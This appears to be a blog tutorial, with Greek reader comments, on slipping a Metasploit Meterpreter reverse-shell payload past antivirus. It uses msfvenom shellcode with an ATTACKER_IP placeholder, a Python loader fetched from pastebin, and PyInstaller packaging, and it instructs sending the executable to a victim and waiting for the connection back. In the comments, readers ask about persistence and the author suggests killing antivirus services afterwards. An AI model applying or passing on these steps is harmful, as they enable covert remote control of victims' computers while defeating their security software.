AntiVirus ByPass using Python
In this article we will try to bypass Antivirus program using Python.But before we start our attack let's check if we have this programs in our VM network.For this attack i use 3 VMs:
- Windows 7 (Victim)
- Windows XP SP2 (PyInstaller)
- Backtrack 5r3 (Metasploit)
Windows XP SP2 (PyInstaller)
- Python version 2.7 (https://www.python.org/ftp/python/2.7.12/python-2.7.12.msi)
- PyInstaller -2.1 (https://github.com/pyinstaller/pyinstaller/releases/download/v2.1/PyInstaller-2.1.zip)
- Pywin32 (https://sourceforge.net/projects/pywin32/files/pywin32/Build/220/)
- pastebin.com/index/rrhcGeHh (Copy the script into a text editor and save the file with *.py extension)
BackTrack 5r3 (Metasploit)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> -a x86 -f c
Copy this shellcode and paste it into pastebin's file and replace the default.
Windows XP SP2
Now transfer the file which you created into windows xp machine into the PyInstaller folder.Open command prompt and type this command inside PyIntaller-2.1.The command below will convert py to exe on the PyIntaller folder.
pyinstaller.py -w -a -F <PY file>
Windows 7 (Antivirus Avira & Windows Firewall On)
- Send file to your victim
- Run metasploit multi_handler exploit
- Wait for connection back
Καμιά ιδέα για να το κάνουμε persistant;;
ReplyDeleteΩραία ερώτηση για άρθρο!Η απάντηση δεν είναι απλή και δεν είναι στανταρ..Κάποια Antivirus μπορεί να το καταλάβουν και το σταματήσουν αλλά τι γίνετε αν μετά την επίθεση κλείσεις τα services του AV ? Δώσε μου λίγο χρόνο και θα ετοιμάσω κάτι ...Ευχαριστώ!
DeleteΙσχύει!Το κάθε AV αντιδρά διαφορετικά!Πάντως σε Eset & Security essentials το κόβει και δεν με αφήνει να κλείσω το service!Θα ήταν πολύ ενδιαφέρον ενα σχετικό άρθρο! Αν δοκιμάσω και άλλα AV θα σου πώ!!
ReplyDelete